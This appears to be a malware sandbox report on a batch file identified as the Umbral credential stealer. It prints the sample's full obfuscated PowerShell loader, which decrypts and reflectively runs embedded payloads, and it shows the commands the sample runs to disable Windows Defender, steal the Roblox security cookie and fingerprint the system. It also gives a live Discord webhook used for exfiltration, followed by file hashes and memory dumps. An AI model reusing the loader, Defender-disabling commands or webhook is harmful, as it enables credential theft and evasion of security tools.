Overview

overview

10

Static

static

1

Umbral.bat

windows10-ltsc 2021-x64

10

Umbral.bat

windows11-21h2-x64

10

Resubmissions

11-01-2025 02:53

250111-ddkf7ssrap 10

Analysis

  • max time kernel
    33s
  • max time network
    35s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    11-01-2025 02:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Umbral.bat

  • Size

    387KB

  • MD5

    1e183c2ada7d55a0ccf510721415d5bc

  • SHA1

    fdf973e881b0999cfde6e1a4404e0a14fba53aab

  • SHA256

    5c857070215559b9e49212029a3ae61eb292347f527ba4b2f8f602eaae003654

  • SHA512

    4b1a3f2e91b01468c219650e8c685bc197cb0fe2907c71db073b4a59d2cfdc91ed7975c1af01de5aed89fa59dd2b17785777e57653b896a4a39f73a65d37ec49

  • SSDEEP

    6144:8idBBBsj84TcfmJNvqNuxdoyw6HWT1uPnCFIv8uOpjMWYYubRJjp03rrHA/APAxL:8idBBV8HolsnC6EUjEOAIdwum+

Score
10/10
umbraldiscoveryexecutionstealer

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1315812787699585118/w2lqDrVQqtFwk0uhRh-_CNIYMagyoPfqPEpCtbHgfK7cFpwIVOyIa3juwBy7vnR8Bh0g

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Umbral.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wTci3adIPYtqwNqviR+bzxwYoPNzIDvidB9TXeKW2VA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1LNpTwGSYS6FnEm0MyrT1w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rcNMZ=New-Object System.IO.MemoryStream(,$param_var); $ARybZ=New-Object System.IO.MemoryStream; $YWZqC=New-Object System.IO.Compression.GZipStream($rcNMZ, [IO.Compression.CompressionMode]::Decompress); $YWZqC.CopyTo($ARybZ); $YWZqC.Dispose(); $rcNMZ.Dispose(); $ARybZ.Dispose(); $ARybZ.ToArray();}function execute_function($param_var,$param2_var){ $Sixjx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SbGkr=$Sixjx.EntryPoint; $SbGkr.Invoke($null, $param2_var);}$VIhio = 'C:\Users\Admin\AppData\Local\Temp\Umbral.bat';$host.UI.RawUI.WindowTitle = $VIhio;$ndlLw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VIhio).Split([Environment]::NewLine);foreach ($QIyrO in $ndlLw) { if ($QIyrO.StartsWith(':: ')) { $uHQeh=$QIyrO.Substring(3); break; }}$payloads_var=[string[]]$uHQeh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops file in Drivers directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2028
      • C:\Users\Admin\AppData\Local\Temp\InjectorForRyker.exe
        "C:\Users\Admin\AppData\Local\Temp\InjectorForRyker.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3912
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 1052
          4⤵
          • Program crash
          PID:4924
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3404
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s ""
        3⤵
        • Views/modifies file attributes
        PID:5016
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:832
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1248
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4432
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:640
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3904
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1936
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:440
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • Detects videocard installed
        • Suspicious behavior: EnumeratesProcesses
        PID:3784
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "" && pause
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:728
        • C:\Windows\system32\PING.EXE
          ping localhost
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2488
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3912 -ip 3912
    1⤵
      PID:2128

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      3eb3833f769dd890afc295b977eab4b4

      SHA1

      e857649b037939602c72ad003e5d3698695f436f

      SHA256

      c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

      SHA512

      c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      2c68559cbe31332bc34ce21502f2993e

      SHA1

      96ce58298b6800a9f09bff28a8a416a50bd10ea9

      SHA256

      97f724ebb263f95405fd736f5c36df8be3febe91be7fe9f2d7463da8a4bbbcee

      SHA512

      16b2e159892b61e3069d0a7f251da0effc763fc03c21843200365aa1776f0f4b91a919f27dc8bec49236636a5147b113b9adbb1c6ff990168874b60eb2bd6d73

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      3KB

      MD5

      0f60f5267323284d7c7ed9cb3649c8bc

      SHA1

      67baafc48f2efe263605d87dd9a7da774bb5f7d0

      SHA256

      f845430f8d0b507b393f6e45ad7be9b840a812f4c19dae814f2c453db6f3c697

      SHA512

      6e5d3bed166a940d15dae768dfe2da07a9674f2438ebb0934b6d86059a594135850936bae1067e61deb0e37f13e7bceb1338f99e39d0bb727ce20a589f0b1cf8

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      6a807b1c91ac66f33f88a787d64904c1

      SHA1

      83c554c7de04a8115c9005709e5cd01fca82c5d3

      SHA256

      155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256

      SHA512

      29f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      948B

      MD5

      a9ab4419e3986b8e240c9478cc52eb51

      SHA1

      7e1b1b31bc47b9d4dccea76e6511d3632cb0395e

      SHA256

      87c993fd034df762cdf24506c046959e98985d38697b234f7ca092db49671846

      SHA512

      8f3d3ac39795b11719f40d3eb9a574576c8a5e6b837a1f3d63f7996faaf728e02ec5e26f4bed71ab850c9fa9272ec94fb6449b251eadc82672f84bdd5ec256a6

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      8e1fdd1b66d2fee9f6a052524d4ddca5

      SHA1

      0a9d0994559d1be2eecd8b0d6960540ca627bdb6

      SHA256

      4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

      SHA512

      5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\InjectorForRyker.exe
      Filesize

      47KB

      MD5

      79462e4c8dbe2f3d18bee712144c093a

      SHA1

      e971c1632c6f3cecb02f7145c56243af2ba3dbcb

      SHA256

      bd7b50f7eb1081db03d83779a4f4bcf348947d808a16494aae259422b184f749

      SHA512

      596d1c44a7c7e4070eff2f525bb93eac760b1512245805c38b98b1ae9a1646c64d9ee2a06223369221f0c1d31b9de8cda1ce79bba13d4fd6080c4138981c2a8f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sspjybw2.fur.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/2028-15-0x000002C4F5270000-0x000002C4F52C2000-memory.dmp

      Filesize

      328KB

      Download

    • memory/2028-88-0x000002C4F5780000-0x000002C4F578A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/2028-111-0x00007FFC5E8F0000-0x00007FFC5F3B2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2028-110-0x00007FFC5E8F0000-0x00007FFC5F3B2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2028-109-0x00007FFC5E8F0000-0x00007FFC5F3B2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2028-108-0x00007FFC5E8F3000-0x00007FFC5E8F5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2028-10-0x000002C4F4FA0000-0x000002C4F4FC2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2028-11-0x00007FFC5E8F0000-0x00007FFC5F3B2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2028-0-0x00007FFC5E8F3000-0x00007FFC5E8F5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2028-14-0x000002C4F4F90000-0x000002C4F4F98000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2028-62-0x000002C4F5700000-0x000002C4F5776000-memory.dmp

      Filesize

      472KB

      Download

    • memory/2028-63-0x000002C4F56B0000-0x000002C4F5700000-memory.dmp

      Filesize

      320KB

      Download

    • memory/2028-64-0x000002C4F5680000-0x000002C4F569E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2028-13-0x00007FFC5E8F0000-0x00007FFC5F3B2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2028-12-0x00007FFC5E8F0000-0x00007FFC5F3B2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2028-89-0x000002C4F6680000-0x000002C4F6692000-memory.dmp

      Filesize

      72KB

      Download

    • memory/2028-18-0x000002C4F52C0000-0x000002C4F5300000-memory.dmp

      Filesize

      256KB

      Download

    • memory/3912-37-0x0000000005560000-0x000000000556A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3912-36-0x0000000005430000-0x0000000005442000-memory.dmp

      Filesize

      72KB

      Download

    • memory/3912-35-0x00000000054A0000-0x0000000005532000-memory.dmp

      Filesize

      584KB

      Download

    • memory/3912-34-0x00000000059B0000-0x0000000005F56000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3912-33-0x0000000000AD0000-0x0000000000AE2000-memory.dmp

      Filesize

      72KB

      Download

    • memory/3912-32-0x00000000745EE000-0x00000000745EF000-memory.dmp

      Filesize

      4KB

      Download